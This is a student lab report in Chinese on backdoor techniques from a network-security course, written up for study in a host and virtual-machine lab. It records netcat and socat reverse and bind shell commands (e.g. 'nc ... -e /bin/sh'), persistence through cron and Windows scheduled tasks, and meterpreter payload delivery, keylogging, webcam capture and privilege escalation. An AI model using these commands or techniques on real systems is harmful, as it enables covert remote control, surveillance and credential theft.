20145210姚思羽《网络对抗技术》后门原理与实践

20145210姚思羽《网络对抗技术》后门原理与实践

基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式？

计算机安装的软件自己就带有后门，安装好这个软件之后后门就进入了计算机系统

2.例举你知道的后门如何启动起来(win及linux)的方式？

（1）定时启动。定好了启动的时间之后后门在特定时间自动启动

（2）在计算机开机之后启动

（3）在用户点击之后启动

3.Meterpreter有哪些给你映像深刻的功能？

（1）捕获用户的键盘输入信息

（2）得到被控制机器的网络接口还有IP地址

（3）下载被控机器的文件，安装病毒

（4）获取用户的密码

（5）控制摄像头

真是个可怕的小妖精...

4.如何发现自己的系统有没有被安装后门？

（1）检查系统启动项，观察可疑启动服务以及可疑路径

（2）在没有打开任何网络连接页面和防火墙的情况下监听本地开放端口，查看是否有本地IP连接外网IP的情况

实验过程记录

一、使用netcat获取主机操作Shell，cron启动

（一）windows获取linux的shell

1.查看主机IP为172.30.1.215

2.查看虚拟机的IP为192.168.19.129

3.主机在ncat文件目录下启动监听

4.虚拟机连接主机

5.我们就在windows下获得一个linux shell，可以运行linux的指令

6.因为linux中的指令是nc 172.30.1.215 5210 -e /bin/sh，所以我们可以在Windows下面运行linux的指令并获取信息，但是我们并不能进行通信，若想进行通信可在linux下输入指令nc 172.30.1.215 5210

（二）linux获取windows的shell

1.linux启动监听

2.Windows连接linux

3.我们可以在linux中看到提示

（三）启动cron

1.在linux中输入crontab -e命令来增加定时任务。这条定时任务就是在特定的时间主机和虚拟机会产生连接，在主机上会获得一个shell。我设定的是在每个小时的第35分钟可以进行连接

2.在第35分钟之前无法输入命令，等到35分钟时才可以输入命令

二、使用socat获取主机操作Shell, 任务计划启动

（一）使用socat获取主机操作Shell

1.在虚拟机中输入socat tcp-listen:5210 exec:bash,pty,stderr绑定连接

2.在win中输入socat readline tcp:192.168.19.129:5210进行反弹连接。连接成功，使用ls命令进行测试

（二）任务计划启动

1.打开计算机管理工具里的任务计划程序，创建一个新的任务

2.对触发器进行设定

3.对操作进行设定

4.启动任务，在虚拟机中连接主机，获得shell

三、使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1.在linux下生成后门程序

2.在linux下输入命令ncat.exe -lv 5210 > 5210.exe传输这个后门程序

3.在主机上接收这个后门程序

4.在linux下输入msfconsole进入msf

5.在虚拟机中设置LHOST为虚拟机IP，端口为5210，开启msf监听

6.在主机上运行刚刚接收的后门程序，linux获得win的shell，可对主机执行操作

四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

1.获取目标主机当前屏幕界面

2.获取键盘内容。keyscan_start为开始获取目标主机键盘输入内容，keyscan_dump为结束获取目的主机键盘内容，输入之后会显示键盘的输入内容

3.获取目标主机摄像头记录

4.在目标主机上安装系统服务

5.对目标主机进行提权，我这里win8没成功

实践总结

1.在启动cron这一步时我遇到了一点小问题，我的主机不能执行虚拟机上的命令，试了很多次都失败了，后来我才发现我计算机上的时间和正确的时间不一样，之前我一直按照正确的时间进行操作，然而在这一次我按照计算机上的时间操作就成功了

2.在任务计划启动那块一开始我创建完任务之后没有启动任务，导致虚拟机这边获取不到win的shell，将任务启动之后就顺利获得shell啦

实践过后觉得自己的计算机并不是百毒不侵的，要提高自己的安全防范意识，及时进行查杀和检查。